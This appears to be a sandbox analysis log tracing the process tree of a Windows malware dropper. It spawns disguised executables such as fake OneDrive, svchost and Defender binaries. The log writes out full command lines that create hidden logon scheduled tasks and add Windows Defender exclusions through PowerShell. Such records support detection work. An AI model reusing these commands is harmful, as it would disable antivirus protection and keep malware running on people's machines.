C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\4363463463464363463463463.exe"1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\OneDrive.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\OneDrive.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:784 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Microsoft OneDrive" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Onedrive\Onedrive.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:2684
-
-
C:\Users\Admin\AppData\Roaming\Onedrive\Onedrive.exe"C:\Users\Admin\AppData\Roaming\Onedrive\Onedrive.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1328 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Microsoft OneDrive" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Onedrive\Onedrive.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:2756
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\FreeYoutubeDownloader.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\FreeYoutubeDownloader.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in Windows directory
PID:2164 -
C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2852 -
C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4576
-
-
C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"4⤵PID:3396
-
-
C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"4⤵PID:7012
-
-
C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"4⤵PID:14144
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\kthiokadjg.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\kthiokadjg.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1648 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\kthiokadjg.exe" /rl HIGHEST /f3⤵
- System Location Discovery: System Language Discovery
PID:1884
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Client-built-Playit.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Client-built-Playit.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3180 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f3⤵PID:3656
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3332 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f4⤵PID:2760
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\self-injection.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\self-injection.exe"2⤵
- Executes dropped EXE
PID:3260
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\jignesh.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\jignesh.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3448
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\donut.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\donut.exe"2⤵
- Executes dropped EXE
PID:3596
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\svchost.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3220
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Lumm.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Lumm.exe"2⤵
- Executes dropped EXE
PID:1820
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\w.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\w.exe"2⤵PID:448
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\requirements.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\requirements.exe"2⤵
- Drops startup file
- Adds Run key to start application
PID:1608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\requirements.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:3180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'requirements.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:3736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\requirements.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:4136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'requirements.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:4468
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "requirements" /tr "C:\Users\Admin\AppData\Local\Temp\requirements.exe"3⤵PID:4980
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\XClient.exe"2⤵PID:3000
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\javaw.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\javaw.exe"2⤵PID:1220
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Componentperf\cfktGpUTtRSX2yQKRIoM3JndHvk9YcKcheeigUIMecfNqLjRtVUp9sGs.vbe"3⤵
- System Location Discovery: System Language Discovery
PID:448 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Componentperf\SQ9jEh0oYRCdpe0w7L4R7l.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:4736 -
C:\Componentperf\componentdll.exe"C:\Componentperf/componentdll.exe"5⤵
- Modifies WinLogon for persistence
- Adds Run key to start application
- Drops file in Windows directory
PID:4416 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c4wt5tns\c4wt5tns.cmdline"6⤵PID:2028
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F5D.tmp" "c:\Users\Admin\AppData\Roaming\CSCF7E8B5E41E644F4A863EEA5AC53162E0.TMP"7⤵PID:812
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4pvynfmw\4pvynfmw.cmdline"6⤵PID:4528
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES80C4.tmp" "c:\Users\Admin\AppData\Roaming\CSC26D8651521544D5CB5F43A7976BC67AD.TMP"7⤵PID:4556
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fyhu0b3s\fyhu0b3s.cmdline"6⤵
- Drops file in Windows directory
PID:656 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81BD.tmp" "c:\Windows\Free Youtube Downloader\Free Youtube Downloader\CSC15D8739DE7804F76AA2AC131BB12FBFA.TMP"7⤵PID:4184
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rx54tdnx\rx54tdnx.cmdline"6⤵PID:4732
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES822B.tmp" "c:\ProgramData\CSC8E36D737D3F7460BB9F393792B8B3980.TMP"7⤵PID:4608
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hhydn5wc\hhydn5wc.cmdline"6⤵PID:4192
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84E9.tmp" "c:\Users\Admin\AppData\Roaming\CSCB425C6E98CA24150AE1AB1C5976DC3F.TMP"7⤵PID:4264
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dzo2k51m\dzo2k51m.cmdline"6⤵PID:2956
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8823.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFC1116F792F547E7B2FAB47901BF3EB.TMP"7⤵PID:4216
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i031fgqh\i031fgqh.cmdline"6⤵
- Drops file in System32 directory
PID:4556 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES895B.tmp" "c:\Windows\System32\CSC712E14D9CECF4FF9B0E6885FEF66F1BD.TMP"7⤵PID:3252
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Componentperf\Onedrive.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:10568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\3a99bb82-4e15-11ef-8354-cae67966b5f6\WmiPrvSE.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:10600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\fr\nobody.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:10596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Componentperf\notepad.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:9456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\es-ES\conhost.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:7620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Componentperf\componentdll.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:8152
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\X4SwxwMrkd.bat"6⤵PID:9568
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:7356
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:5864
-
-
C:\Windows\es-ES\conhost.exe"C:\Windows\es-ES\conhost.exe"7⤵PID:10996
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GCUhdmH1So.bat"8⤵PID:6620
-
C:\Windows\system32\chcp.comchcp 650019⤵PID:6744
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost9⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5604
-
-
C:\Windows\es-ES\conhost.exe"C:\Windows\es-ES\conhost.exe"9⤵PID:10976
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6Nq0CBezpn.bat"10⤵PID:8100
-
C:\Windows\system32\chcp.comchcp 6500111⤵PID:10440
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:211⤵PID:10504
-
-
C:\Windows\es-ES\conhost.exe"C:\Windows\es-ES\conhost.exe"11⤵PID:11008
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Destover.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Destover.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4356
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\connector1.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\connector1.exe"2⤵PID:9612
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\av_downloader1.1.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\av_downloader1.1.exe"2⤵PID:12048
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2349.tmp\234A.tmp\234B.bat C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\av_downloader1.1.exe"3⤵PID:12976
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\svhost.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\svhost.exe"2⤵PID:14480
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Autoupdate.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Autoupdate.exe"2⤵PID:8472
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\4363463463464363463463463.exe"1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1532 -
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\defender64.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\defender64.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2124 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:872
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2236 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f4⤵PID:2464
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\m8ta88Kiln64.bat" "4⤵PID:2180
-
C:\Windows\system32\chcp.comchcp 650015⤵PID:1168
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1672
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2808 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:1852
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\swW3XYCvsUv1.bat" "6⤵PID:2768
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:1040
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:112
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3684 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:3748
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\LxHgwyztmy77.bat" "8⤵PID:3828
-
C:\Windows\system32\chcp.comchcp 650019⤵PID:3856
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost9⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3864
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3608 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f10⤵
- Scheduled Task/Job: Scheduled Task
PID:2092
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\3hQGbZdvxsRI.bat" "10⤵PID:3732
-
C:\Windows\system32\chcp.comchcp 6500111⤵PID:3764
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost11⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3748
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3196 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f12⤵
- Scheduled Task/Job: Scheduled Task
PID:3272
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\jAyKKAQDRDw3.bat" "12⤵PID:3128
-
C:\Windows\system32\chcp.comchcp 6500113⤵PID:3192
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3248
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3908 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f14⤵
- Scheduled Task/Job: Scheduled Task
PID:4048
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RmzlwqSgw3T5.bat" "14⤵PID:4080
-
C:\Windows\system32\chcp.comchcp 6500115⤵PID:3792
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost15⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3752
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"15⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3860 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f16⤵
- Scheduled Task/Job: Scheduled Task
PID:2632
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\GcRT8UAX7VCk.bat" "16⤵PID:1880
-
C:\Windows\system32\chcp.comchcp 6500117⤵PID:1760
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost17⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3448
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"17⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3256 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f18⤵PID:3924
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ls35vfOBkIyM.bat" "18⤵PID:4080
-
C:\Windows\system32\chcp.comchcp 6500119⤵PID:3360
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost19⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3368
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"19⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3544 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f20⤵PID:3748
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8QnzQXHzQcVX.bat" "20⤵PID:1800
-
C:\Windows\system32\chcp.comchcp 6500121⤵PID:2704
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost21⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3288
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"21⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3368 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f22⤵
- Scheduled Task/Job: Scheduled Task
PID:2584
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\DoLZmipSMJOX.bat" "22⤵PID:3772
-
C:\Windows\system32\chcp.comchcp 6500123⤵PID:3896
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost23⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3712
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"23⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3464 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f24⤵
- Scheduled Task/Job: Scheduled Task
PID:3736
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\NxPf6MxmlYM4.bat" "24⤵PID:3616
-
C:\Windows\system32\chcp.comchcp 6500125⤵PID:1456
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost25⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3456
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"25⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4188 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f26⤵
- Scheduled Task/Job: Scheduled Task
PID:4444
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\b6tduI6hJVTy.bat" "26⤵PID:4500
-
C:\Windows\system32\chcp.comchcp 6500127⤵PID:4528
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost27⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4484
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"27⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3272 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f28⤵
- Scheduled Task/Job: Scheduled Task
PID:4876
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ZVFCej9P9U3s.bat" "28⤵PID:4668
-
C:\Windows\system32\chcp.comchcp 6500129⤵PID:4540
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost29⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4136
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"29⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4432 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f30⤵PID:4636
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\SqIZjg4Td8BY.bat" "30⤵PID:4392
-
C:\Windows\system32\chcp.comchcp 6500131⤵PID:11140
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost31⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9136
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"31⤵PID:10344
-
